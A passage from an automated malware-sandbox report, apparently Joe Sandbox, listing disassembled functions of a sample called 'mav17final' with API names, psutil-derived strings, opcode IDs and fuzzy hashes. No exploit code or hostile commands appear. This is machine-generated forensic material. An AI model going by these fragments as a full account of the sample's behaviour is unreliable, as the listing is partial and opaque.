                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: EnumProcesses
                                                  • String ID:
                                                  • API String ID: 84517404-0
                                                  • Opcode ID: 4c91ff0ec2273356573cf0176f4b2079e72363d77241c0c5429492b96c40a274
                                                  • Instruction ID: 27a656cdbb708630621f0c457b15a31276bf0568e0f5c92196b404a0364e5ef3
                                                  • Opcode Fuzzy Hash: 4c91ff0ec2273356573cf0176f4b2079e72363d77241c0c5429492b96c40a274
                                                  • Instruction Fuzzy Hash: 5E115621B096C682EF64CF29A8441396BA1FF98BE0F185035EB4E47764DE3CE447C710
                                                  Function 00007FF8BFAB4730 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073762995.00007FF8BFAB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                                                  • Associated: 00000002.00000002.2073728007.00007FF8BFAB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073799607.00007FF8BFAB6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073849663.00007FF8BFAB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8bfab0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AdminUser
                                                  • String ID:
                                                  • API String ID: 2487005531-0
                                                  • Opcode ID: d0030d7d39ed1f1285109f3f3c4a92fc536e9fee5458ecd4838dc556b7ba0fb5
                                                  • Instruction ID: 589562f61f2adfc1cde80cdba36535f082beed8b657e9c731b96d6230f4919a8
                                                  • Opcode Fuzzy Hash: d0030d7d39ed1f1285109f3f3c4a92fc536e9fee5458ecd4838dc556b7ba0fb5
                                                  • Instruction Fuzzy Hash: 14F0F9B2108F45D9C702CF59E45109DB724F755BC8B418A22EF8D53B29CF38D091CA40
                                                  Function 00007FF8BFAB42E0 Relevance: 1.4, APIs: 1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073762995.00007FF8BFAB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                                                  • Associated: 00000002.00000002.2073728007.00007FF8BFAB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073799607.00007FF8BFAB6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073849663.00007FF8BFAB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8bfab0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID:
                                                  • API String ID: 3510742995-0
                                                  • Opcode ID: b007cc5a7efe170316438a21b032e88e071ebebb1f436b5cacc6e359ddb69198
                                                  • Instruction ID: a21a340d984cdb8395b4d2466585f26a21f8974a26e8e38b89f254531b477704
                                                  • Opcode Fuzzy Hash: b007cc5a7efe170316438a21b032e88e071ebebb1f436b5cacc6e359ddb69198
                                                  • Instruction Fuzzy Hash: A0518D72B04F8585DB28CFA9D4415A933A8FB49BE8B559222EF2D0779ADF38D452C340

                                                  Non-executed Functions

                                                  Function 00007FF8B9077350 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 230nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ErrorProcess$Last$MemoryRead$Query$InformationOpenStatusVirtual
                                                  • String ID: (originated from %s)$NtQueryInformationProcess(ProcessBasicInformation)$NtQueryInformationProcess(ProcessWow64Information)$OpenProcess$VirtualQueryEx$automatically set for PID 0
                                                  • API String ID: 3746328393-2577306957
                                                  • Opcode ID: 60ad0263dde9d9d4aabe87fb791252ebf2ef1ca0c33daef83303b80fb3f24a23
                                                  • Instruction ID: 4e3dbba5332e1f47d29880050d0f0fc9a9e238576bf6a86a66718727637bc0d2
                                                  • Opcode Fuzzy Hash: 60ad0263dde9d9d4aabe87fb791252ebf2ef1ca0c33daef83303b80fb3f24a23
                                                  • Instruction Fuzzy Hash: 5FA16E21B08AC282EF649F2DA8546BD2B61BF64BE4F404131DF1E476A8DF3CE5479350
                                                  Function 00007FF8B9076EB0 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 200memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free$Handle$AllocCloseCriticalInformationQuerySectionSystem$CreateCurrentDuplicateEnterErrorLastLeaveThread
                                                  • String ID: NtQuerySystemInformation$SystemExtendedHandleInformation buffer too big
                                                  • API String ID: 1610506324-122811375
                                                  • Opcode ID: 23bd3201bfe8e194a530111dde7cb7d9009c5d267a9dd5dcae8a74e34f207bab
                                                  • Instruction ID: 3b851517d221fa1313d6a29a7267646cd8771a2b75276107d66c1e2cae98c3b0
                                                  • Opcode Fuzzy Hash: 23bd3201bfe8e194a530111dde7cb7d9009c5d267a9dd5dcae8a74e34f207bab
                                                  • Instruction Fuzzy Hash: 17914D31A08AC681EE549F6AE8583792BA5BF65BE5F404435CB5E437A0EF3CE446C340
                                                  Function 00007FF8B9072730 Relevance: 42.2, APIs: 18, Strings: 6, Instructions: 167memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$CloseHandle$AllocFreeMemoryQueryVirtual$ErrorLastOpen
                                                  • String ID: NtQueryVirtualMemory -> STATUS_ACCESS_DENIED$NtQueryVirtualMemory bufsize is too large$NtQueryVirtualMemory(MemoryWorkingSetInformation)$OpenProcess$automatically set for PID 0$psutil_pid_is_running -> 0
                                                  • API String ID: 2640067250-943580704
                                                  • Opcode ID: ebd61d9221d57dc638e02f8ad4ad6f0fdd8e08548c923c5a7d7a68149336ff86
                                                  • Instruction ID: 7ca06a2079535b7b68da6c5cad6e820051d82dbbfbb317c4910964ce49d7f9ce
                                                  • Opcode Fuzzy Hash: ebd61d9221d57dc638e02f8ad4ad6f0fdd8e08548c923c5a7d7a68149336ff86
                                                  • Instruction Fuzzy Hash: 26613221A096C696FF509F2EA8542796B91BF69BF1F488435CB4E43794EE3CE447C310
                                                  Function 00007FF8B9075750 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 184fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorLast$CloseControlDeviceHandleswprintf_s$CreateFile
                                                  • String ID: $(IILLKK)$DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i$DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i$PhysicalDrive%i$\\.\PhysicalDrive%d$psutil-debug [%s:%d]> $psutil/arch/windows/disk.c
                                                  • API String ID: 4154591606-594890268
                                                  • Opcode ID: fb760e5c1ffcda8e2c85039de333cfd78706c0c72841b6d628fcc3194f71e0ac
                                                  • Instruction ID: 743e2dfe0cf32e3276c6114e0068cded8749bbf7dbfe94c1bdfbcce507a7cc92
                                                  • Opcode Fuzzy Hash: fb760e5c1ffcda8e2c85039de333cfd78706c0c72841b6d628fcc3194f71e0ac
                                                  • Instruction Fuzzy Hash: 32911D31A09BC682EF609F29E4546BA7BA4FBA4BE0F404536DB5D42B94DF3CE546C700
                                                  Function 00007FF8B9075AC0 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$Drive$LogicalStringsType
                                                  • String ID: (ssssIi)$,compressed$,readonly$A:\
                                                  • API String ID: 1858615190-2665560882
                                                  • Opcode ID: 324f283dc96aaf79baf5b8741b53a9d30ac7edbd6d79a2edb2edf0179091d86f
                                                  • Instruction ID: 2c11bdaa15cdd0b352e1ce1ddc2239f1319b1842adce90d1c527aee723bbc50f
                                                  • Opcode Fuzzy Hash: 324f283dc96aaf79baf5b8741b53a9d30ac7edbd6d79a2edb2edf0179091d86f
                                                  • Instruction Fuzzy Hash: 3EC15D31A08AC686EF249F28E8483B96BA0FF65BE4F444535DB5E46694DF3CE50AC700
                                                  Function 00007FF8B9072C20 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 163threadtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ThreadThread32$FirstNextOpenTimes
                                                  • String ID: CreateToolhelp32Snapshot$GetThreadTimes$Thread32First$forced for PID 0$kdd$psutil_pid_is_running -> 0
                                                  • API String ID: 2004732974-1899450870
                                                  • Opcode ID: 5c05b741d32a9e74ae1e37773a437aa9a54614c169c7061445edb5306e85afe8
                                                  • Instruction ID: e50be29f983c82cdf48ff53bd0950bdba31d26d83b0d3e0b4a6f8212ac801b74
                                                  • Opcode Fuzzy Hash: 5c05b741d32a9e74ae1e37773a437aa9a54614c169c7061445edb5306e85afe8
                                                  • Instruction Fuzzy Hash: E6718431A08AC686EE51DF3DE854279A7A5FFA4BE0F444231EB5E42694EF3CE446C700
                                                  Function 00007FF8B90776F0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 132nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$Process$InformationQuery$ErrorLastOpen
                                                  • String ID: NtQueryInformationProcess(ProcessBasicInformation)$NtQueryInformationProcess(ProcessBasicInformation) -> STATUS_NOT_FOUND$NtQueryInformationProcess(ProcessCommandLineInformation)$OpenProcess$automatically set for PID 0$requires Windows 8.1+
                                                  • API String ID: 2499767732-710783819
                                                  • Opcode ID: 1883265a9de43d32804f2f34731455dbb28d37745193e24d4b2dd825a0e20e50
                                                  • Instruction ID: 6b9ca8fe408f072c8c99da143c07e8dd251ff3fe95e479bf6004d4777dc5e8f9
                                                  • Opcode Fuzzy Hash: 1883265a9de43d32804f2f34731455dbb28d37745193e24d4b2dd825a0e20e50
                                                  • Instruction Fuzzy Hash: 9A514921A08A8281FE549F2AE8542792BA1BF69BF0F544131DB5E477A4EE3CE487C351
                                                  Function 00007FF8B9075160 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 247nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystemfprintf
                                                  • String ID: GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$NtQuerySystemInformation(SystemInterruptInformation)$NtQuerySystemInformation(SystemPerformanceInformation)$NtQuerySystemInformation(SystemProcessorPerformanceInformation)$kkkk$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 4178052153-892315520
                                                  • Opcode ID: a8280bf19d9845c31920fb1052be415145c37dff5d34ef6775ebd0b2bf8e894c
                                                  • Instruction ID: e6bf6dbf5634cb015697f079556613ab338cce180afe44009e932de5d54295b3
                                                  • Opcode Fuzzy Hash: a8280bf19d9845c31920fb1052be415145c37dff5d34ef6775ebd0b2bf8e894c
                                                  • Instruction Fuzzy Hash: 6EB1C371A18A8687EF119F2DE4441B96BA0FFA5BE9B404232DB1E52760EF3CF546C300
                                                  Function 00007FF8B9076B00 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 82memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree$ErrorFileLastObjectQueryType
                                                  • String ID: NtQuerySystemInformation
                                                  • API String ID: 153063055-2549949336
                                                  • Opcode ID: d0fe6c8589d1fec388b321b26f75b63068b38b3295e68ecc0905a5dfb750dbf5
                                                  • Instruction ID: 46945d3040edc262dea9b338e6730e381047a033dfa596495543e058ab9e94bf
                                                  • Opcode Fuzzy Hash: d0fe6c8589d1fec388b321b26f75b63068b38b3295e68ecc0905a5dfb750dbf5
                                                  • Instruction Fuzzy Hash: E5315A30B08B8282EE549F6AB8442392BA1FF69BE1F554435CB4E477A1EF3DE4468301
                                                  Function 00007FF8B9078620 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 181serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseEnumErrorHandleLastServiceServicesStatus$ManagerOpen
                                                  • String ID: (OO)$(originated from %s)$OpenSCManager
                                                  • API String ID: 2999948660-3715750162
                                                  • Opcode ID: 27637bdd0ad7537abde288dd67001ff09bcbbe8bc61dc3196441b72dbecfe48b
                                                  • Instruction ID: 4311231500f20129c61ca20eb56d3e4755265c05d096c4b15bbaf66235685861
                                                  • Opcode Fuzzy Hash: 27637bdd0ad7537abde288dd67001ff09bcbbe8bc61dc3196441b72dbecfe48b
                                                  • Instruction Fuzzy Hash: C1814D72A0DAC281EE658F29A88427A7BA0FF95BF0F444135DB5E42794DF3CE446C700
                                                  Function 00007FF8B90763A0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 260COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: inet_ntop$AdaptersAddressesConvertIpv4LengthMaskswprintf_s
                                                  • String ID: %.2X$%.2X-$(OiOOOO)
                                                  • API String ID: 804476567-528653562
                                                  • Opcode ID: c0a452c1174e2cf7d6e79eb3bc4e276580985fca42ce442fcb64fc7de046b566
                                                  • Instruction ID: 68e51c6a69104949518a9024a3731238c4cde80f78963ce025a9addc138b8f1c
                                                  • Opcode Fuzzy Hash: c0a452c1174e2cf7d6e79eb3bc4e276580985fca42ce442fcb64fc7de046b566
                                                  • Instruction Fuzzy Hash: EFC17C32A09BC681EE649F2AA84867A7BA0FFA5BE4F444035CB4E47754DF3CE446C701
                                                  Function 00007FF8B9072B30 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpenResumeSuspend
                                                  • String ID: NtSuspend|ResumeProcess$OpenProcess$automatically set for PID 0
                                                  • API String ID: 2719000058-3759402225
                                                  • Opcode ID: 3d5dde5fc1f47f0ed35c3e43225d5f904c9510dc86047000f49375528cba329b
                                                  • Instruction ID: 86dcb82753e5c383a3b87ae97f2a78d5aea3bdfba23317c4ba796bf4b89a7d30
                                                  • Opcode Fuzzy Hash: 3d5dde5fc1f47f0ed35c3e43225d5f904c9510dc86047000f49375528cba329b
                                                  • Instruction Fuzzy Hash: 39213221B0C58781EF549F2EE8841796BA2BFA87E0F544035DB1D47795DE2CE8878710
                                                  Function 00007FF8B90CAAD8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 313767242-0
                                                  • Opcode ID: a7a0b375acf53c908aaa84b1677749aa5f730714d3c2174efe7977e719f92665
                                                  • Instruction ID: b854335d4f62e62a4bd1b6f3fbc208c930ccfc3259429c83fe6f4483ad46b440
                                                  • Opcode Fuzzy Hash: a7a0b375acf53c908aaa84b1677749aa5f730714d3c2174efe7977e719f92665
                                                  • Instruction Fuzzy Hash: 02311A72609AC186EB609F68E8403ED7375FB84784F44443ADB4E47A95DF38D64ED710
                                                  Function 00007FF8B9F66254 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 313767242-0
                                                  • Opcode ID: ea38b9b02c827df44fb5011cb61d735aee822b3a281d6ad786fd76dbeb1e9228
                                                  • Instruction ID: 02b414f1fb625d8bdb456605ff57d87b4f902fa9ea1dbba20c8de247fdb7e756
                                                  • Opcode Fuzzy Hash: ea38b9b02c827df44fb5011cb61d735aee822b3a281d6ad786fd76dbeb1e9228
                                                  • Instruction Fuzzy Hash: 91311872609BC18AEB609FA8E8407E97760FB857A5F44443ADB4E47B98EF3CD548C710
                                                  Function 00007FF8B9841B00 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 313767242-0
                                                  • Opcode ID: 491c6c3a996b181e7d4f6ff731a66c8976c72585f48119a1a83f76a26148e78e
                                                  • Instruction ID: dcdca3f709bd2bb0817f8f0d859dab31ba611e8350f94001eccc7beff3af2209
                                                  • Opcode Fuzzy Hash: 491c6c3a996b181e7d4f6ff731a66c8976c72585f48119a1a83f76a26148e78e
                                                  • Instruction Fuzzy Hash: FD311E72709AC286EB609F68E8407ED7360FB94784F44453ADB4D47B98DF38D648C710
                                                  Function 00007FF8B9072030 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8B90781C0: OpenProcess.KERNEL32(?,?,?,00007FF8B9071966), ref: 00007FF8B90781DA
                                                    • Part of subcall function 00007FF8B90781C0: GetLastError.KERNEL32(?,?,?,00007FF8B9071966), ref: 00007FF8B90781E8
                                                    • Part of subcall function 00007FF8B90781C0: CloseHandle.KERNEL32(?,?,?,00007FF8B9071966), ref: 00007FF8B907820B
                                                  • CommandLineToArgvW.SHELL32 ref: 00007FF8B9072144
                                                  • GetLastError.KERNEL32 ref: 00007FF8B9072152
                                                  Strings
